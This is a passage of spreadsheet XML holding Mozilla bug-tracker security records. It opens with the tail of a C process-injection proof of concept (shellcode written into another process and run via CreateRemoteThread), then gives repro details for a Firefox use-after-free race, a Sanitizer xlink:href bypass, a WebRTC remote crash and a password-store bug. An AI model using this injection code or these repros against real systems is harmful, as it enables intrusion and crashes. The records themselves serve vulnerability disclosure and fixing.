"\x6A\x02"           // PUSH 0 duplicate same access
"\x6A\x00"           // PUSH 0 inherit
"\x6A\x00"           // PUSH 0 dwDesiredAccess
"\x6A\x00"           // PUSH 0 lpTargetHandle
"\x68\xff\xff\xff\xff"//PUSH 0 // hTargetProcessHandle
"\x68\xff\xff\xff\xff"//PUSH 0 // hSourceHandle
"\x68\x8c\x01\x00\x00"//PUSH 18C // hSourceProcessHandle
"\x68\x00\x87\x5f\x76"//PUSH 765f8700  &lt;--- ptr to kernel32!DuplicateHandle
"\x58"		//          POP EAX
"\xFF\xD0"  //          CALL EAX
"\xcc\xcc\x90\x90\xc3";
int _tmain(int argc, _TCHAR* argv[])
{
	INT pid = _wtoi(argv[1]);
	printf("[-] Attaching to process %d\n", pid);
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid);
	printf("[-] Process handle: 0x%x\n", hProcess);
	VOID *dllname = VirtualAllocEx(hProcess, NULL, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(hProcess, dllname, (void*)code, sizeof(code), NULL);
	printf("[-] remote code: %x\n", dllname);
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) dllname, dllname, 0, NULL);
	printf("[-] Remote thread: %x\n", hThread);
	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	CloseHandle(hProcess);
	return 0;
}</t>
        </is>
      </c>
      <c r="X2420" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2421">
      <c r="A2421" t="n">
        <v>1791314</v>
      </c>
      <c r="B2421" t="inlineStr">
        <is>
          <t>2022-09-18 05:08:31 -0700</t>
        </is>
      </c>
      <c r="C2421" t="inlineStr">
        <is>
          <t>Heap-use-after-free race condition in blob objectURL loading</t>
        </is>
      </c>
      <c r="D2421" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:40 -0700</t>
        </is>
      </c>
      <c r="E2421" t="n">
        <v>1</v>
      </c>
      <c r="F2421" t="n">
        <v>1</v>
      </c>
      <c r="G2421" t="n">
        <v>3</v>
      </c>
      <c r="H2421" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2421" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2421" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2421" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2421" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2421" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2421" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2421" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-review][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q2421" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2421" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2421" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T2421" t="n">
        <v>1</v>
      </c>
      <c r="U2421" t="n">
        <v>0</v>
      </c>
      <c r="V2421" t="n">
        <v>37</v>
      </c>
      <c r="W2421" t="inlineStr">
        <is>
          <t>Created attachment 9295181
loader.html
Tested on:
    OS: Ubuntu 22.04
    Firefox: 
     :$ fuzzfetch --target firefox --os Linux --asan --fuzzing -n firefox
            &gt; Identified task: https://firefox-ci-tc.services.mozilla.com/api/index/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-fuzzing-asan-opt
            &gt; Task ID: IboI9AdYS7Owkt5NGknp5Q
            &gt; Rank: 1663450354
            &gt; Changeset: 09d4c0163454293e8431301cf5799d6ed96164f2
            &gt; Build ID: 20220917213234
            &gt; Downloading: https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/IboI9AdYS7Owkt5NGknp5Q/artifacts/public/build/target.tar.bz2 (470.55MiB total)
Reprofile 'loader.html' contains a large HTML string that is converted to a blob and to an objectURL, which is loaded to an iframe. The HTML string has a script that changes top.location to point to document.location from within the iframe. There seems to be a race condition where the browser sometimes ends up to use-after-free when trying to loading the objectURL
as main page.
Easiest way to reproduce is by using ffpuppet and prefpicker. In my tests prefpicker was not mandatory, but tested that the issue also reproduces with fuzzing prefs.
```
$ ffpuppet -d -p ./prefs.js -u  ./loader.html ./firefox/firefox
```
Few things to note:
    * If you want to reproduce the issue by loading as a single file, you may need to reload the file couple of times. In my testing VM the issue reproduced 9/10 tries. If you are having 
      hard time reproducing, you can run python3 -m http.server on the reprofile directory. The reprofile already has redirection to top.location="http://127.0.0.1:8000/loader.html" for the http server.
      Note that using the http server slows the process down and makes the issue slower to reproduce.
    * Depending on timing the issue can reproduce as a heap-use-after-free with different stack traces, or as a ubsan "runtime error: applying non-zero offset 4096 to null pointer", few different 
      ASAN traces as an attachments. On my machine the used HTML string had high frequency for use-after-free.
    * Outside of the script to load top.location, the content of the HTML string doesn't really matter. The race seems to be easier to reproduce with a larger and more complex HTML strings.
ASAN-trace summaries:
```
==469580==ERROR: AddressSanitizer: heap-use-after-free on address 0x6210006028a9 at pc 0x7fb55122eaee bp 0x7fb5221afcc0 sp 0x7fb5221afcb8
READ of size 1 at 0x6210006028a9 thread T19
    #0 0x7fb55122eaed in encoding_rs::utf_8::convert_utf8_to_utf16_up_to_invalid::h9a48addeb16fe1c4 /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/utf_8.rs:304:46
    #1 0x7fb551306e92 in encoding_rs::handles::Utf16Destination::copy_utf8_up_to_invalid_from::h87b18c80f0f13c1c /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/handles.rs:724:31
    #2 0x7fb551306e92 in encoding_rs::utf_8::Utf8Decoder::decode_to_utf16_raw::hce13a9354eb98962 /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/utf_8.rs:506:17
```
```
==470424==ERROR: AddressSanitizer: heap-use-after-free on address 0x62100060fadd at pc 0x7f86daf04c77 bp 0x7f86abe81cc0 sp 0x7f86abe81cb8
READ of size 16 at 0x62100060fadd thread T19
    #0 0x7f86daf04c76 in core::intrinsics::copy_nonoverlapping::h7cef3b9efd772203 /builds/worker/fetches/rust/library/core/src/intrinsics.rs:2137:9
    #1 0x7f86daf04c76 in encoding_rs::simd_funcs::load16_unaligned::hae46f61ffef24749 /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/simd_funcs.rs:20:5
    #2 0x7f86daf04c76 in encoding_rs::ascii::ascii_to_basic_latin_stride_neither_aligned::hc02e43498f051222 /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/ascii.rs:799:24
    #3 0x7f86daf04c76 in encoding_rs::ascii::ascii_to_basic_latin::hd2cb5a3ac8e1a55e /builds/worker/checkouts/gecko/third_party/rust/encoding_rs/src/ascii.rs:457:25
```
UBSAN-trace:
```
/builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:440:27: runtime error: applying non-zero offset 4096 to null pointer
    #0 0x7f38d08a857a in nsBufferedInputStream::ReadSegments(nsresult (*)(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*), void*, unsigned int, unsigned int*) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:440:27
    #1 0x7f38d2495600 in nsHtml5StreamParser::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:1661:21
    #2 0x7f38d24952ea in nsHtml5StreamListener::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamListener.cpp:91:9
    #3 0x7f38d08a2caf in nsBaseChannel::OnDataAvailable(nsIRequest*, nsIInputStream*, unsigned long, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:876:28
```</t>
        </is>
      </c>
      <c r="X2421" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2422">
      <c r="A2422" t="n">
        <v>397122</v>
      </c>
      <c r="B2422" t="inlineStr">
        <is>
          <t>2007-09-21 16:29:51 -0700</t>
        </is>
      </c>
      <c r="C2422" t="inlineStr">
        <is>
          <t>NSS 3.12 alpha treats a key3.db with no global salt as having no password</t>
        </is>
      </c>
      <c r="D2422" t="inlineStr">
        <is>
          <t>2007-10-25 18:19:04 -0700</t>
        </is>
      </c>
      <c r="E2422" t="n">
        <v>1</v>
      </c>
      <c r="F2422" t="n">
        <v>1</v>
      </c>
      <c r="G2422" t="n">
        <v>3</v>
      </c>
      <c r="H2422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2422" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2422" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2422" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L2422" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2422" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2422" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2422" t="inlineStr"/>
      <c r="Q2422" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2422" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2422" t="inlineStr">
        <is>
          <t>3.12</t>
        </is>
      </c>
      <c r="T2422" t="n">
        <v>1</v>
      </c>
      <c r="U2422" t="n">
        <v>0</v>
      </c>
      <c r="V2422" t="n">
        <v>16</v>
      </c>
      <c r="W2422" t="inlineStr">
        <is>
          <t>Created attachment 281895
Testcase: key3.db 
[Spinoff from bug 393835, which was getting long and messy.]
Reporter filed a bug regarding a loss of stored passwords after switching from Firefox 2 to a Filefix 3 alpha (trunk). We were able to recreate the problem using the reporter's key3.db (on XP and OS X).
If I enable password manager debugging, I see this logged to the console when it's invoked:
PwMgr Storage: Initializing key3.db with default blank password.
This is generated in http://mxr.mozilla.org/seamonkey/source/toolkit/components/passwordmgr/src/storage-Legacy.js:
 132         // Check to see if the internal PKCS#11 token has been initialized.
 133         // If not, set a blank password.
 134         var tokenDB = Cc["@mozilla.org/security/pk11tokendb;1"]
 135                             .getService(Ci.nsIPK11TokenDB);
 136 
 137         var token = tokenDB.getInternalKeyToken();
 138         if (token.needsUserInit) {
 139             this.log("Initializing key3.db with default blank password.");
 140             token.initPassword("");
 141         }
This indicates that |token.needsUserInit| is returning true for some reason. The branch version of this code is identical (although in C++).
[Another issue here is that the .initPassword() call seems to succeed, but it shouldn't because there's already a master password set. I'm hoping that's just a side-effect of whatever is broken.]
To reproduce:
1) Create a new profile with Firefox 2, and quit browser.
2) Copy the attacked key3.db / signons2.txt into the new profile.
3) Start Firefox 2, view all passwords. Enter "TestPwd01" when prompted for the master password. Note that there is 1 login stored (google.com, user = "username", pass = "password").
4) Quit Firefox 2, start Firefox 3.
5) Go to view all passwords... Note that the "Use a Master Password" checkbox is no longer checked, and that no passwords appear to be stored.
6) Enabling the MP as "TestPwd01" doesn't help.
I also tried to recreate to problem *without* using the reporter's key3.db, by starting with a new FF2 profile, doing a variety of things, and then updating to Firefox 3... That always worked. I'm not sure what's special about this supplied key3.db, but if it works fine in FF2 it ought to work fine in FF3.</t>
        </is>
      </c>
      <c r="X2422" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2423">
      <c r="A2423" t="n">
        <v>927687</v>
      </c>
      <c r="B2423" t="inlineStr">
        <is>
          <t>2013-10-16 18:28:09 -0700</t>
        </is>
      </c>
      <c r="C2423" t="inlineStr">
        <is>
          <t>Avoid unsigned integer wrapping in PL_ArenaAllocate</t>
        </is>
      </c>
      <c r="D2423" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:23 -0800</t>
        </is>
      </c>
      <c r="E2423" t="n">
        <v>1</v>
      </c>
      <c r="F2423" t="n">
        <v>1</v>
      </c>
      <c r="G2423" t="n">
        <v>3</v>
      </c>
      <c r="H2423" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2423" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J2423" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K2423" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2423" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2423" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2423" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2423" t="inlineStr"/>
      <c r="Q2423" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2423" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2423" t="inlineStr">
        <is>
          <t>4.10.2</t>
        </is>
      </c>
      <c r="T2423" t="n">
        <v>1</v>
      </c>
      <c r="U2423" t="n">
        <v>0</v>
      </c>
      <c r="V2423" t="n">
        <v>19</v>
      </c>
      <c r="W2423" t="inlineStr">
        <is>
          <t>Created attachment 818175
Patch
The attached patch for PL_ArenaAllocate ensures that the sums of unsigned integers
don't wrap.
Note that a-&gt;base, a-&gt;avail, and a-&gt;limit are of the PRUword type, an unsigned
integer type large enough to hold a pointer. The patch relies on the invariant
that a-&gt;base &lt;= a-&gt;limit and a-&gt;avail &lt;= a-&gt;limit.</t>
        </is>
      </c>
      <c r="X2423" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2424">
      <c r="A2424" t="n">
        <v>771942</v>
      </c>
      <c r="B2424" t="inlineStr">
        <is>
          <t>2012-07-08 13:24:46 -0700</t>
        </is>
      </c>
      <c r="C2424" t="inlineStr">
        <is>
          <t>[FIX] DataDocumentContentPolicy should apply to chrome documents</t>
        </is>
      </c>
      <c r="D2424" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2424" t="n">
        <v>1</v>
      </c>
      <c r="F2424" t="n">
        <v>1</v>
      </c>
      <c r="G2424" t="n">
        <v>3</v>
      </c>
      <c r="H2424" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2424" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2424" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2424" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2424" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2424" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2424" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2424" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q2424" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2424" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2424" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T2424" t="n">
        <v>1</v>
      </c>
      <c r="U2424" t="n">
        <v>0</v>
      </c>
      <c r="V2424" t="n">
        <v>29</v>
      </c>
      <c r="W2424" t="inlineStr">
        <is>
          <t>It is very strange that data documents may load stuff if they are chrome documents.
This lead to bug 770684 (though, I'll fix that bug in some other way).
As far as I see, we have similar problems as bug 770684 if someone does
something like document.implementation.createHTMLDocument("").body.innerHTML = "stuff".
If that stuff contains images or scripts, they are loaded, I think.</t>
        </is>
      </c>
      <c r="X2424" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" t="n">
        <v>1079729</v>
      </c>
      <c r="B2425" t="inlineStr">
        <is>
          <t>2014-10-08 01:58:53 -0700</t>
        </is>
      </c>
      <c r="C2425" t="inlineStr">
        <is>
          <t>PeerConnection.createDataChannel crashes remote end in mozilla::detail::PrimitiveIntrinsics&lt;int&gt;::sub(long*, long)</t>
        </is>
      </c>
      <c r="D2425" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:50 -0700</t>
        </is>
      </c>
      <c r="E2425" t="n">
        <v>1</v>
      </c>
      <c r="F2425" t="n">
        <v>1</v>
      </c>
      <c r="G2425" t="n">
        <v>3</v>
      </c>
      <c r="H2425" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2425" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2425" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K2425" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2425" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2425" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2425" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2425" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+]</t>
        </is>
      </c>
      <c r="Q2425" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2425" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2425" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T2425" t="n">
        <v>1</v>
      </c>
      <c r="U2425" t="n">
        <v>0</v>
      </c>
      <c r="V2425" t="n">
        <v>26</v>
      </c>
      <c r="W2425" t="inlineStr">
        <is>
          <t>Created attachment 8501609
webrtc-dc-testcourt.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Build ID: 20140924083558
Steps to reproduce:
1. Load the attached page webrtc-dc-testcourt.html in two Firefox instances
2. In instance A click "Create Offer"
3. Copy the resulting offer from the lower textarea of instance A into the upper textarea of instance B and on instance B click "Accept offer"
4. Copy the resulting answer from the lower textarea of instance B into the upper textarea of instance A and on instance A click "Accept answer"
5. On instance A you should see "open event: dc onopen" and no instance B you should see "info event: pc ondatachannel"
6. On instance A click "Create additional DC"
7. Instance B should log "info event: pc ondatachannel"
Actual results:
When repeating step 6 multiple times (seems to differ between 8 and 10), instance B crashes.
Expected results:
AFAIK it should be possible to open at least 16 Data Channels per PeerConnection (netwerk/sctp/datachannel/DataChannelProtocol.h:#define WEBRTC_DATACHANNEL_STREAMS_DEFAULT 16)
What should actually never happen is that one end crashes completely.</t>
        </is>
      </c>
      <c r="X2425" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2426">
      <c r="A2426" t="n">
        <v>1338809</v>
      </c>
      <c r="B2426" t="inlineStr">
        <is>
          <t>2017-02-11 10:01:09 -0800</t>
        </is>
      </c>
      <c r="C2426" t="inlineStr">
        <is>
          <t>Attempting to run xpcshell tests on Android 5+ fails with "error: only position independent executables (PIE) are supported."</t>
        </is>
      </c>
      <c r="D2426" t="inlineStr">
        <is>
          <t>2020-12-21 10:36:12 -0800</t>
        </is>
      </c>
      <c r="E2426" t="n">
        <v>1</v>
      </c>
      <c r="F2426" t="n">
        <v>1</v>
      </c>
      <c r="G2426" t="n">
        <v>6</v>
      </c>
      <c r="H2426" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2426" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2426" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="K2426" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2426" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2426" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2426" t="inlineStr"/>
      <c r="Q2426" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2426" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T2426" t="n">
        <v>1</v>
      </c>
      <c r="U2426" t="n">
        <v>0</v>
      </c>
      <c r="V2426" t="n">
        <v>12</v>
      </c>
      <c r="W2426" t="inlineStr">
        <is>
          <t>I assume this happens when you try running xpcshell tests on a physical device running Android 5.0 or newer (my phone runs 6.0.1).</t>
        </is>
      </c>
      <c r="X2426" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2427">
      <c r="A2427" t="n">
        <v>1528587</v>
      </c>
      <c r="B2427" t="inlineStr">
        <is>
          <t>2019-02-16 19:32:06 -0800</t>
        </is>
      </c>
      <c r="C2427" t="inlineStr">
        <is>
          <t>Address bar spoof using history navigation and blocked ports</t>
        </is>
      </c>
      <c r="D2427" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:37 -0700</t>
        </is>
      </c>
      <c r="E2427" t="n">
        <v>1</v>
      </c>
      <c r="F2427" t="n">
        <v>1</v>
      </c>
      <c r="G2427" t="n">
        <v>3</v>
      </c>
      <c r="H2427" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2427" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2427" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2427" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2427" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2427" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q2427" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2427" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T2427" t="n">
        <v>1</v>
      </c>
      <c r="U2427" t="n">
        <v>0</v>
      </c>
      <c r="V2427" t="n">
        <v>57</v>
      </c>
      <c r="W2427" t="inlineStr">
        <is>
          <t>Created attachment 9044466
mozilla-firefox.zip
Address Bar Spoofing security issue was tested against newest version of Mozilla Firefox. Both Linux and Windows version were behaving the same way which means both of them are vulnerable. I have tested it on 64bit Operating Systems(Ubuntu 16.04 and Windows 7). Client itself was 64bit as well. I have attached zip file containing report with the vulnerability details including poc code and short mp4 video. Please contact me via: oess44@gmail.com. Regards</t>
        </is>
      </c>
      <c r="X2427" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2428">
      <c r="A2428" t="n">
        <v>1770888</v>
      </c>
      <c r="B2428" t="inlineStr">
        <is>
          <t>2022-05-23 22:57:43 -0700</t>
        </is>
      </c>
      <c r="C2428" t="inlineStr">
        <is>
          <t>Sanitizer fragment-only check for &lt;svg:use href=...&gt; bypassed by xlink:href</t>
        </is>
      </c>
      <c r="D2428" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:35 -0700</t>
        </is>
      </c>
      <c r="E2428" t="n">
        <v>1</v>
      </c>
      <c r="F2428" t="n">
        <v>1</v>
      </c>
      <c r="G2428" t="n">
        <v>3</v>
      </c>
      <c r="H2428" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2428" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2428" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2428" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2428" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2428" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main102+]</t>
        </is>
      </c>
      <c r="Q2428" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2428" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2428" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T2428" t="n">
        <v>1</v>
      </c>
      <c r="U2428" t="n">
        <v>0</v>
      </c>
      <c r="V2428" t="n">
        <v>13</v>
      </c>
      <c r="W2428" t="inlineStr">
        <is>
          <t>The Sanitizer API restricts the value of an SVG `&lt;use href="..."&gt;` attribute to fragment URLs by default, so that nodes can't be imported from different documents.
However this check doesn't currently consider `xlink:href`, although that's a valid fallback used by [`SVGUseElement::Href()`](https://searchfox.org/mozilla-central/rev/a688eb56e8f69acef88bbad1b224b5bd70dba842/dom/svg/SVGUseElement.cpp#169-173).
### Testcase
```js
new Sanitizer().sanitize(new DOMParser().parseFromString(`
&lt;svg&gt;
    &lt;use href="#foo"/&gt;
    &lt;use href="http://example/#bar"/&gt;
    &lt;use xlink:href="http://example/#baz"/&gt;
&lt;/svg&gt;
`, 'text/html')).firstChild.outerHTML
```
Expected result:
```
&lt;svg&gt;
    &lt;use href="#foo"&gt;&lt;/use&gt;
    &lt;use&gt;&lt;/use&gt;
    &lt;use&gt;&lt;/use&gt;
&lt;/svg&gt;
```
Actual result:
```
&lt;svg&gt;
    &lt;use href="#foo"&gt;&lt;/use&gt;
    &lt;use&gt;&lt;/use&gt;
    &lt;use xlink:href="http://example/#baz"&gt;&lt;/use&gt;
&lt;/svg&gt;
```
AFAIU, this happens because the fragment-only check in `nsTreeSanitizer::SanitizeAttributes()` is only done [for attributes without a set namespace](https://searchfox.org/mozilla-central/rev/a688eb56e8f69acef88bbad1b224b5bd70dba842/dom/base/nsTreeSanitizer.cpp#1210,1218-1219). So a patch might be just something like:
```diff
diff --git a/dom/base/nsTreeSanitizer.cpp b/dom/base/nsTreeSanitizer.cpp
--- a/dom/base/nsTreeSanitizer.cpp
+++ b/dom/base/nsTreeSanitizer.cpp
@@ -1262,7 +1262,8 @@ void nsTreeSanitizer::SanitizeAttributes
       // else not allowed
     } else if (aAllowed.mXLink &amp;&amp; kNameSpaceID_XLink == attrNs) {
       if (nsGkAtoms::href == attrLocal) {
-        if (SanitizeURL(aElement, attrNs, attrLocal)) {
+        bool fragmentOnly = aElement-&gt;IsSVGElement(nsGkAtoms::use);
+        if (SanitizeURL(aElement, attrNs, attrLocal, fragmentOnly)) {
           // in case the attribute removal shuffled the attribute order, start
           // the loop again.
           --ac;
```
The fragment-only check was introduced in https://hg.mozilla.org/mozilla-central/rev/37819efa513e53663bad1ebbb47035a8eff16e24 which references bug 1757210, so I'm linking to that one (it's view-restricted, so just guessing).
NB: This has probably already been discussed, but I was just wondering if, given that `xlink:` attributes are considered deprecated in the docs, the sanitizer could just convert `xlink:href` into a native `href`, and drop support for XLink otherwise, so that it doesn't need to be handled as a special case at every turn.</t>
        </is>
      </c>
      <c r="X2428" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2429">
      <c r="A2429" t="n">
        <v>71037</v>
      </c>
      <c r="B2429" t="inlineStr">
        <is>
          <t>2001-03-06 09:53:48 -0800</t>
        </is>
      </c>
      <c r="C2429" t="inlineStr">
        <is>
          <t>Localizability issue in AB import : hardcoded string</t>
        </is>
      </c>
      <c r="D2429" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:23 -0700</t>
        </is>
      </c>
      <c r="E2429" t="n">
        <v>1</v>
      </c>
      <c r="F2429" t="n">
        <v>1</v>
      </c>
      <c r="G2429" t="n">
        <v>3</v>
      </c>
      <c r="H2429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2429" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2429" t="inlineStr">
        <is>
          <t>Localization</t>
        </is>
      </c>
      <c r="K2429" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2429" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2429" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2429" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2429" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q2429" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
